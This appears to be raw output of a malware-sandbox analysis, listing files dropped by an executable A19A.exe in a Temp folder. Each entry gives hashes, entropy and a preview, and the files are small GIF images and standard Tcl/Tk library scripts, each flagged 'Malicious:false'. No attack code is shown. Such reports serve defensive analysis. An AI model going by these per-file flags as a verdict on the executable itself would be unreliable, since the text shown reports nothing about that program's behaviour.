                                                                                                                                                                                                                                                                                                                                Preview:GIF89aa...............................f.................f...ff.f3.f..33.3............f..ff.f3.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....a......@.pH,...r.l:..TB.T..V..z..H.j..h...&.......t"....F...d..gN~Y...g....}..r....g.....o...g.......Y.w..W......N....Z....W....f...tL.~.f....New............W.M.r.........O.q........W-./i.*...`..z..F9.../9..-.......$6..G..S...........zB.,nw.64...e4.......HOt......f.....)..OX..C.eU.(.Qh.....T..<Q.Y.P.L.YxT....2........ji..3.^)zz..O.a..6 ...TZ........^...7.....>|P.....w$...k.ZF.\R.u....F.]Z.--(v+)[Y....=.!.W..+.]..]._.....&..../Ap...j...!..b.:...{.^.=.`...U.....@Hf..\?.(..Lq@.........0..L...a...&.!.....]#..]G \..q...A.H.X[...(.W......,...1a..B...W(.t.8.AdG.)..(P=...Uu.u..A.KM\...'r.R./.W..d2a.0..G...?...B......#H........1Q.0...R....%+...0.I..{.<......QV.tz'.yn.E.p..0i.I.g......L....%....K...A.l.ph.Q.1e...Z....g..2e...smU&d;.J..
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 113 x 175
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2981
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.758793907956808
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:AmEwM8ioQoHJQBTThKVI7G78NLL120GFBBFXJRxlu+BmO/5lNqm7Eq:B57QoHJQt4II8BZ+jxluZO/5lNqm7Eq
                                                                                                                                                                                                                                                                                                                                MD5:DA5FB10F4215E9A1F4B162257972F9F3
                                                                                                                                                                                                                                                                                                                                SHA1:8DB7FB453B79B8F2B4E67AC30A4BA5B5BDDEBD3B
                                                                                                                                                                                                                                                                                                                                SHA-256:62866E95501C436B329A15432355743C6EFD64A37CFB65BCECE465AB63ECF240
                                                                                                                                                                                                                                                                                                                                SHA-512:990CF306F04A536E4F92257A07DA2D120877C00573BD0F7B17466D74E797D827F6C127E2BEAADB734A529254595918C3A5F54FDBD859BC325A162C8CD8F6F5BE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:GIF89aq...............................f.................f...ff.f3.f..33.3............f..ff.f3.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3................................................................!.. -dl-.!.......,....q......@.pH,...r.l:....A}H...v..R......D.VF..,%M....^.....fyzU.P..f...i.....t..Uqe..N..Z..i......~....g......u.....g......\...h.....P...h.....Q..g....Z..h......]......\...M...[..s...c2.+R.$. ......#.....)v..4....MO.b.....9......[.M.........h'..<-..=.....HQD....D?.~......W7. ..V.W0..l....*0p}..KP?c.\@KW.S(..M..B.....-q...S2...*.,..P.{....F..._MAn ....i.Y3............zh.y.j@...a876...ui.i..;K.........p...`.,}w....tv.m...Y..........;.;.e).e&.......-.NC.*4..(........*..F........[,w....f......E....h..a3.T.^.........)...C.N8.h\T...+&.z....g]H..B..#.t6..Z.....j.-..N......TI....A........M?..Q&V'...Mb.f.x...h.$r.U .9..Ci. ].4.Zb..@...X....%..<..b)V!........Y)x......T.....h.p.d..h..(........]@.**J.M.U.Jf...Y.:....F..g:..d..6q.-..
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 130 x 200
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3491
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.790611381196208
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:ROGuxkQ9mcV7RXcECEtqCa+6GK8WseNXhewFIp9ZmL4u:ROGwpVOEbqCrWsUhtIk4u
                                                                                                                                                                                                                                                                                                                                MD5:A5E4284D75C457F7A33587E7CE0D1D99
                                                                                                                                                                                                                                                                                                                                SHA1:FA98A0FD8910DF2EFB14EDAEC038B4E391FEAB3C
                                                                                                                                                                                                                                                                                                                                SHA-256:BAD9116386343F4A4C394BDB87146E49F674F687D52BB847BD9E8198FDA382CC
                                                                                                                                                                                                                                                                                                                                SHA-512:4448664925D1C1D9269567905D044BBA48163745646344E08203FCEF5BA1524BA7E03A8903A53DAF7D73FE0D9D820CC9063D4DA2AA1E08EFBF58524B1D69D359
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:GIF89a................................f.................f...ff.f3.f..33.3............f..ff.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,...........@.pH,...r.l:..T..F$XIe..V$.x..V.Z.z..F.pxd~..........{....o....l..{.b...hi[}P.k...y.....y.f.._R.\...............m.....y.....x......^.Q...j.....\S.....^.......l......]...[.......).....{....7...`..<...`..">..i.?/..@............>..Z.z@....0B..r...j.V.I.@..;%R...*...J.p.A.t.*..$A*...>`.....@g5BP.A..p.x.............q..8...... ...(.Q..#..@...F..YSK..M..#o.....D.m..-.....k}...BT..V......'.....`.d..~;..9+..6...<b.eZ..y^0]0..I...=.6.....}.0<.Z...M...Y1*35.e.....b...U0F~.-.HT......l2.s.q`-....y...e....dPZ....~.zT.M.... "r.E/k. ...*..Lj@'........Pcd&.(..mxF_w.."K..x!..--Y`..A.....Be.jH.A..\..j.....du#.....]^...>......].i.FMO..].9n1",Y...F...EW.9.....0TY.T...Cv!i`%...Hz@.]..U.!Y...#Dv&pi.z(.mn.A....@Q.0.%...&.4.v.cw(.`cd'|..M9..."...,*.......
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 48 x 75
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1171
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.289201491091023
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:DOfHIzP8hqiF+oyPOmp3XHhPBlMVvG0ffWLpfc:DGoPM+o0OmZXHhOv5WRc
                                                                                                                                                                                                                                                                                                                                MD5:7013CFC23ED23BFF3BDA4952266FA7F4
                                                                                                                                                                                                                                                                                                                                SHA1:E5B1DED49095332236439538ECD9DD0B1FD4934B
                                                                                                                                                                                                                                                                                                                                SHA-256:462A8FF8FD051A8100E8C6C086F497E4056ACE5B20B44791F4AAB964B010A448
                                                                                                                                                                                                                                                                                                                                SHA-512:A887A5EC33B82E4DE412564E86632D9A984E8498F02D8FE081CC4AC091A68DF6CC1A82F4BF99906CFB6EA9D0EF47ADAC2D1B0778DCB997FB24E62FC7A6D77D41
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:GIF89a0.K.............................f.................f...ff.f3.f..33.3.........f..ff.f3.3f.33.3.f..ff.ff.f3ff333f.3f.33.33f.3......................................................................!.. -dl-.!.......,....0.K....@.pH,...GD.<:..%SR.Z......<.V.$l.....z......:.. .|v[D..f...z.W.G.Vr...NgsU.yl..qU..`.......`fe`.......Fg....(.&...g.Y.. .."..q.V.$.'.Ez.W....y...Y.U...(#Xrf.........Xux.U..........(U.4...X....G.B..t..1S...R..Y. ...l ..".>.h......,%K....A.....<s....#..8.iK.....a.y$h..DQh.PE)....6.....MyL.qzF..... ."..Y0..a......2..*t..Ma..b...M..R.....\..st..=....Q......,>s`....Qt.,..B.R.....!.$..%.....(...s...B.T...`,".h(. D....8..dC..\Q.p.......x.#A.....:..du..(D.XV......7....S.#n8a....2`...f.:G,...==(......`!..$...t....b..../N|...f..J.x... P&.|.d._!N...].1w.3D.0!....@o&H...N.B.J....pz8..w.i....=r.............@5.-!.......H."..[.j.AB<..p....h...V.D..6.h...ab1F.g...I !.V~.H..V.........:.G..|c...,.....TD5..c[.W.....LC.....FJ..71[..lH.M.....8.:$......
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 100 x 100
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):5473
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.754239979431754
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:+EqG96vSGfyJZ26G6U1LI7nTD2enhjc+2VBnOqcUERVIim:+46KcyJI6G6uU7/LhjlkhQR7m
                                                                                                                                                                                                                                                                                                                                MD5:048AFE69735F6974D2CA7384B879820C
                                                                                                                                                                                                                                                                                                                                SHA1:267A9520C4390221DCE50177E789A4EBD590F484
                                                                                                                                                                                                                                                                                                                                SHA-256:E538F8F4934CA6E1CE29416D292171F28E67DA6C72ED9D236BA42F37445EA41E
                                                                                                                                                                                                                                                                                                                                SHA-512:201DA67A52DADA3AE7C533DE49D3C08A9465F7AA12317A0AE90A8C9C04AA69A85EC00AF2D0069023CD255DDA8768977C03C73516E4848376250E8D0D53D232CB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:GIF89ad.d...................RJJ...B99.......RBB..B11ZBB!....R991!!...)....{{B!!R)).JJ.ss.ZZ.BB.kk.RR.JJ.BB9...JJR!!.ZZ.BB.11.99.{s.sk.kc.cZ.ZR.JB.ZR.JB.JB.RJ.B9.91.B9...{.JB.91.B9.B9.1){)!.)!.9)..ZR.JB{91.cR{1).ZJ.ZJ.RB.J9.B1.B1.9).1!....{B9.{k.scc1).kZZ)!c)!.9).B1.9).9).1!.1!.1!.B).9!.9!.1..).....{.sZ1)R)!.B1.B1.ZBR!..9).ZB.9).R9.R9.1!.J1.J1.B).B).9!.9!.1..1..).....sZ.J9.ZB.cJJ!.{1!.B).9!{)..9!.J).B!.B!.9..R1).kJ)!.B1{9).R9.cB.Z9.Z9.B).Z9.B).R1.9!.R1.J).J).B!.1..9....{.s.J9.{Z.ZB.sR.kJk1!.cB.cB.R1.R).1..B!.J!.B.....R91.J1).c.kJ.J).Z1.B!.B!..9!..{R.sJ.Z9.R1{9!..s.R9.Z...J91Z9){B)...............B91..1)!..............................RJR............B)1......R19........BJ.9B..{..s{......!.......,....d.d.@............0@PHa....*.p...7.8.y...C.s6Z.%Q.#s.`:B.N....4jd.K.0..|y....F@.......1~ ......'Y.B"C&R.V.R.4$k.3...D.......Ef*Y3..M........BDV._.....\..).]..>s..$H\%y0WL...d.......D..'..v..1Kz.Zp$;S
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2267
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.097909341674822
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:JlZuZcRTvy3DauG4+bHnr32s3eGw8YKxPiOXR3ojdS+mFf:JScFaz+bL3e8n3XR3ojdtOf
                                                                                                                                                                                                                                                                                                                                MD5:C88F99DECEC11AFA967AD33D314F87FE
                                                                                                                                                                                                                                                                                                                                SHA1:58769F631EB2C8DED0C274AB1D399085CC7AA845
                                                                                                                                                                                                                                                                                                                                SHA-256:2CDE822B93CA16AE535C954B7DFE658B4AD10DF2A193628D1B358F1765E8B198
                                                                                                                                                                                                                                                                                                                                SHA-512:4CD59971A2614891B2F0E24FD8A42A706AE10A2E54402D774E5DAA5F6A37DE186F1A45B1722A7C0174F9F80625B13D7C9F48FDB03A7DDBC6E6881F56537B5478
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:This software is copyrighted by the Regents of the University of.California, Sun Microsystems, Inc., Scriptics Corporation, ActiveState.Corporation, Apple Inc. and other parties. The following terms apply to.all files associated with the software unless explicitly disclaimed in.individual files...The authors hereby grant permission to use, copy, modify, distribute,.and license this software and its documentation for any purpose, provided.that existing copyright notices are retained in all copies and that this.notice is included verbatim in any distributions. No written agreement,.license, or royalty fee is required for any of the authorized uses..Modifications to this software may be copyrighted by their authors.and need not follow the licensing terms described here, provided that.the new terms are clearly indicated on the first page of each file where.they apply...IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY.FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQ
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):14594
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.895853767062079
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:ZBjtAc4YusFvbg36UFchqHjNw8wSdy+1a22YDE/q:ZFgqUBjW8RQcf
                                                                                                                                                                                                                                                                                                                                MD5:C33963D3A512F2E728F722E584C21552
                                                                                                                                                                                                                                                                                                                                SHA1:75499CFA62F2DA316915FADA2580122DC3318BAD
                                                                                                                                                                                                                                                                                                                                SHA-256:39721233855E97BFA508959B6DD91E1924456E381D36FDFC845E589D82B1B0CC
                                                                                                                                                                                                                                                                                                                                SHA-512:EA01D8CB36D446ACE31C5D7E50DFAE575576FD69FD5D413941EEBBA7CCC1075F6774AF3C69469CD7BAF6E1068AA5E5B4C560F550EDD2A8679124E48C55C8E8D7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# listbox.tcl --.#.# This file defines the default bindings for Tk listbox widgets.# and provides procedures that help in implementing those bindings..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1995 Sun Microsystems, Inc..# Copyright (c) 1998 by Scriptics Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#--------------------------------------------------------------------------.# tk::Priv elements used in this file:.#.# afterId -..Token returned by "after" for autoscanning..# listboxPrev -.The last element to be selected or deselected.#...during a selection operation..# listboxSelection -.All of the items that were selected before the.#...current selection operation (such as a mouse.#...drag) started; used to cancel an operation..#--------------------------------------------------------------------------..#-------------------------------------
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9569
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.736161258754494
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:cp4NSZKF/bcaQTViJ8pox8tJRd/v0tAANQSLkROOp+4BQjBC:jSZKF/Iaarpocdn07NQS34ao
                                                                                                                                                                                                                                                                                                                                MD5:7176A4FE8EC3EA648854F1FC1BB2EA89
                                                                                                                                                                                                                                                                                                                                SHA1:28D96419585881C6222BC917EDB9A5863E7C519B
                                                                                                                                                                                                                                                                                                                                SHA-256:D454FC4E25D9DFC704556A689A17AA6F3D726F99592995952BC6492FC8F19F6E
                                                                                                                                                                                                                                                                                                                                SHA-512:8C33E1CD3490945DDC5DA0585E655A7FC78C9950886F68C096D103AE510C1024632AB3D41E9573937BB4359D365FFB8F5A10B1CA7BFBD37442F40985107C1C8D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# megawidget.tcl.#.#.Basic megawidget support classes. Experimental for any use other than.#.the ::tk::IconList megawdget, which is itself only designed for use in.#.the Unix file dialogs..#.# Copyright (c) 2009-2010 Donal K. Fellows.#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES..#..package require Tk 8.6...::oo::class create ::tk::Megawidget {. superclass ::oo::class. method unknown {w args} {..if {[string match .* $w]} {.. [self] create $w {*}$args.. return $w..}..next $w {*}$args. }. unexport new unknown. self method create {name superclasses body} {..next $name [list \...superclass ::tk::MegawidgetClass {*}$superclasses]\;$body. }.}..::oo::class create ::tk::MegawidgetClass {. variable w hull options IdleCallbacks. constructor args {..# Extract the "widget name" from the object name..set w [namespace tail [self]]...# Configure things..tclParseConfigSpec [my varname op
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):38077
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.872052715667624
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:0K5IzCPGH0a9tVbQDBTo06DpSCeihpzuxdyQYEuH9DAe1:0K5i1HDE6AWuxdRYxHS8
                                                                                                                                                                                                                                                                                                                                MD5:181ED74919F081EEB34269500E228470
                                                                                                                                                                                                                                                                                                                                SHA1:953EB429F6D98562468327858ED0967BDC21B5AD
                                                                                                                                                                                                                                                                                                                                SHA-256:564AC0040176CC5744E3860ABC36B5FFBC648DA20B26A710DC3414EAE487299B
                                                                                                                                                                                                                                                                                                                                SHA-512:220E496B464575115BAF1DEDE838E70D5DDD6D199B5B8ACC1763E66D66801021B2D7CD0E1E1846868782116AD8A1F127682073D6EACD7E73F91BCED89F620109
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# menu.tcl --.#.# This file defines the default bindings for Tk menus and menubuttons..# It also implements keyboard traversal of menus and implements a few.# other utility procedures related to menus..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1998-1999 by Scriptics Corporation..# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of tk::Priv that are used in this file:.#.# cursor -..Saves the -cursor option for the posted menubutton..# focus -..Saves the focus during a menu selection operation..#...Focus gets restored here when the menu is unposted..# grabGlobal -..Used in conjunction with tk::Priv(oldGrab): if.#...tk::Priv(oldGrab) is non-empty, then tk::Pr
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):29352
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.110577585375791
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:hmie+xwcBO/SHAqFySrhkvQueYpx8DPF52qdREXXZ2/OODi:I+xwcBO/SHAqFySrhAQueYD8D95TOL
                                                                                                                                                                                                                                                                                                                                MD5:5F3793E7E582111C17C85E23194AEFD5
                                                                                                                                                                                                                                                                                                                                SHA1:925D973B70252384D1DE9B388C6C2038E646FDDF
                                                                                                                                                                                                                                                                                                                                SHA-256:0AC9D11D4046EF4D8E6D219F6941BF69C6AE448C6A1C2F7FC382F84B5786F660
                                                                                                                                                                                                                                                                                                                                SHA-512:2922546BA69232DBC205FE83EF54916E334E7AC93B7A26A208341F9C101209DA84C73F48C52BDB8E63E71A545853652B86378EBEB88F000BC16FCFB0EF5D8517
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# mkpsenc.tcl --.#.# This file generates the postscript prolog used by Tk...namespace eval ::tk {. # Creates Postscript encoding vector for ISO-8859-1 (could theoretically. # handle any 8-bit encoding, but Tk never generates characters outside. # ASCII).. #. proc CreatePostscriptEncoding {} {..variable psglyphs..# Now check for known. Even if it is known, it can be other than we..# need. GhostScript seems to be happy with such approach..set result "\[\n"..for {set i 0} {$i<256} {incr i 8} {.. for {set j 0} {$j<8} {incr j} {...set enc [encoding convertfrom "iso8859-1" \....[format %c [expr {$i+$j}]]]...catch {... set hexcode {}... set hexcode [format %04X [scan $enc %c]]...}...if {[info exists psglyphs($hexcode)]} {... append result "/$psglyphs($hexcode)"...} else {... append result "/space"...}.. }.. append result "\n"..}..append result "\]"..return $result. }.. # List of adobe glyph names. Converted from glyphlist.txt, downloaded from. # Ad
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:xbm image (32x, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):16527
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.679051291122852
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:aWsDPYblrrfcRcfjAwnAVDTS3ifQjvwMXEcjY:aTRcfjAwGTfQjvPXt0
                                                                                                                                                                                                                                                                                                                                MD5:C93F295967350F7010207874992E01A5
                                                                                                                                                                                                                                                                                                                                SHA1:CAE8EF749F7618326B3307DA7ED6DEBB380286DD
                                                                                                                                                                                                                                                                                                                                SHA-256:52C5B87C99C142D5FC77E0C22B78B7CD63A4861756FD6B39648A2E9A8EDDE953
                                                                                                                                                                                                                                                                                                                                SHA-512:F7E60211C0BC1ECEDE03022D622C5B9AAEAE3C203A60B6B034E1886F857C8FAD6BA6B1F7BA1EE7D733720775E7108F1BFD4C5B54A0F4919CE4EB43851D1190F8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# msgbox.tcl --.#.#.Implements messageboxes for platforms that do not have native.#.messagebox support..#.# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# Ensure existence of ::tk::dialog namespace.#.namespace eval ::tk::dialog {}..image create bitmap ::tk::dialog::b1 -foreground black \.-data "#define b1_width 32\n#define b1_height 32.static unsigned char q1_bits[] = {. 0x00, 0xf8, 0x1f, 0x00, 0x00, 0x07, 0xe0, 0x00, 0xc0, 0x00, 0x00, 0x03,. 0x20, 0x00, 0x00, 0x04, 0x10, 0x00, 0x00, 0x08, 0x08, 0x00, 0x00, 0x10,. 0x04, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,. 0x01, 0x00, 0x00, 0x80, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,. 0x04, 0x00, 0x00, 0x20, 0x08, 0x00,
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4158
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.744283779865612
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:RC98Kz+4GgKafRXwSl51gmJnANlsgPVG5QOFWQfl5:RC98/4PGi51gmAsgPVjm5
                                                                                                                                                                                                                                                                                                                                MD5:EBAFA3EE899EBB06D52C204493CEE27A
                                                                                                                                                                                                                                                                                                                                SHA1:95E6C71E4525A8DD91E488B952665AE9C5FBDDED
                                                                                                                                                                                                                                                                                                                                SHA-256:D1B0FED0BEA51B3FAF08D8634034C7388BE7148F9B807460B7D185706DB8416F
                                                                                                                                                                                                                                                                                                                                SHA-512:ADDE3C85A7A4148BAFD6C8B8902FC8C229F1D1AAF118BE85F44E4667237E66938864E2B7B4486B7C68C89EB4559F1D8367F9F563B9C6C8BCAB66118B36E670B8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset cs "&Abort" "&P\u0159eru\u0161it". ::msgcat::mcset cs "&About..." "&O programu...". ::msgcat::mcset cs "All Files" "V\u0161echny soubory". ::msgcat::mcset cs "Application Error" "Chyba programu". ::msgcat::mcset cs "Bold Italic". ::msgcat::mcset cs "&Blue" "&Modr\341". ::msgcat::mcset cs "Cancel" "Zru\u0161it". ::msgcat::mcset cs "&Cancel" "&Zru\u0161it". ::msgcat::mcset cs "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nemohu zm\u011bnit atku\341ln\355 adres\341\u0159 na \"%1\$s\".\nP\u0159\355stup odm\355tnut.". ::msgcat::mcset cs "Choose Directory" "V\375b\u011br adres\341\u0159e". ::msgcat::mcset cs "Cl&ear" "Sma&zat". ::msgcat::mcset cs "&Clear Console" "&Smazat konzolu". ::msgcat::mcset cs "Color" "Barva". ::msgcat::mcset cs "Console" "Konzole". ::msgcat::mcset cs "&Copy" "&Kop\355rovat". ::msgcat::mcset cs "Cu&t" "V&y\u0159\355znout". ::msgcat::mcset cs "&Delete" "&Smazat"
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3909
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6030170761850915
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:G8ONjSf5s80vWCUx5kTvgXTfODYE9lAUt:G8OmB0ZUx5kTv4sbt
                                                                                                                                                                                                                                                                                                                                MD5:C414C6972F0AAD5DFA31297919D0587F
                                                                                                                                                                                                                                                                                                                                SHA1:529AE0B0CB9D1DBC7F8844F346149E151DE0A36B
                                                                                                                                                                                                                                                                                                                                SHA-256:85E6CEE6001927376725F91EAA55D17B3D9E38643E17755A42C05FE491C63BDE
                                                                                                                                                                                                                                                                                                                                SHA-512:0F2A777B9C3D6C525097E19D1CC4525E9BAF78E0CABF54DD693C64BC1FD4EA75402D906A8302489997BA83ABA5AFD7CA1DE30FFE0888CD19950F56A9D38B018A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset da "&Abort" "&Afbryd". ::msgcat::mcset da "&About..." "&Om...". ::msgcat::mcset da "All Files" "Alle filer". ::msgcat::mcset da "Application Error" "Programfejl". ::msgcat::mcset da "&Blue" "&Bl\u00E5". ::msgcat::mcset da "Cancel" "Annuller". ::msgcat::mcset da "&Cancel" "&Annuller". ::msgcat::mcset da "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ikke skifte til katalog \"%1\$s\".\nIngen rettigheder.". ::msgcat::mcset da "Choose Directory" "V\u00E6lg katalog". ::msgcat::mcset da "Cl&ear" "&Ryd". ::msgcat::mcset da "&Clear Console" "&Ryd konsolen". ::msgcat::mcset da "Color" "Farve". ::msgcat::mcset da "Console" "Konsol". ::msgcat::mcset da "&Copy" "&Kopier". ::msgcat::mcset da "Cu&t" "Kli&p". ::msgcat::mcset da "&Delete" "&Slet". ::msgcat::mcset da "Details >>" "Detailer". ::msgcat::mcset da "Directory \"%1\$s\" does not exist." "Katalog \"%1\$s\" findes ikke.". ::msg
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4823
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5738552657551566
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:13LquGgagtG6vz8MFi9dDvbwKAN92qqMXg07Qt:L1/w5jwKYH1Et
                                                                                                                                                                                                                                                                                                                                MD5:07DF877A1166E81256273F1183B5BDC9
                                                                                                                                                                                                                                                                                                                                SHA1:CB455F910208E2E55B27A96ABD845FEEDA88711A
                                                                                                                                                                                                                                                                                                                                SHA-256:06DD7572626DF5CB0A8D3AFFBAC9BB74CB12469076836D66FD19AE5B5FAB42C7
                                                                                                                                                                                                                                                                                                                                SHA-512:197B09F37647D1D5130A084EA1D99D0CC16C815EC0AC31EC07875BEB2DFAE2197E2AF3E323FE8CB35F90912D76D3EB88D1E56F6E026F87AEDFADB7534BA2675A
                                                                                                                                                                                                                                                                                                                                Malicious:false
